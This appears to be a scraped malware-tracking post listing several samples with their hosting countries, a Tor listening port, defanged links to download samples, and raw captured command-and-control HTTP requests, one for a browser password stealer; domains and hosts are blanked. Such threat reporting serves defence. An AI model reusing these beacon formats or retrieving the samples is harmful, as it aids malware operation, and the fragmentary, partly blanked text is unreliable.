malware Using Tor Hosted In United States Matawan Choopa Llc)

Domain : Resolved : [ ] To [ ] Resolved : [ ] To [ ] Other ip’s used :  Opened Listening Ports: 9050   tcp 1028   tcp Executable is spoofed to .mp4. Get it here :  hxxp:// Hosting Infos : Malware Hosted In Russian Federation Moscow Avguro Technologies Ltd. Hosting Service Provider)

Domain Name : HTTP Requests : Data : POST /finsess.php HTTP/1.0 Host: Connection: close User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Content-Type: application/x-www-form-urlencoded Content-Length: 26 1=1882869218&2=&3=&99=15&^ Get sample here : hxxp:// Hosting infos : Malware Hosted In Russian Federation Moscow Fast Serv Inc.) URL hxxp:// DATA : POST /b/connect/2 HTTP/1.1 Accept: */* Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/4.0(compatible; MSIE 7.0b; Windows NT 6.0) Host: Content-Length: 51 Cache-Control: no-cache cs=aW5zZXJ0&p=Windows+XP+32+HOME&m=3107216218&v=3.0 Hosting Infos : hosted in Spain Madrid Propelin Consulting S.l.u.)

Contacts domains Contacts server In general it steals passwords from browsers and get’s all the informations from the infected machines. GET /installer_stats/?action_id=1003&action_description=Virtual&channel_id=&channel_subid=1&channel_param=0&installer_id=101&installer_version= HTTP/1.1 User-Agent: NSIS_ToolkitOffers (Mozilla) Host: Cache-Control: no-cache” Sample here Hosting infos malware hosted in Bosnia And Herzegovina Banja Luka Blicnet D.o.o.)

Domains used by the malware: HTTP Requests: URI: DATA: POST /dffgbDFGvf465/YYf.php HTTP/1.0 Host: Accept: */* Accept-Encoding: identity, *;q=0 Accept-Language: en-US Content-Length: 272 Content-Type: application/octet-stream Connection: close Content-Encoding: binary User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022) samples: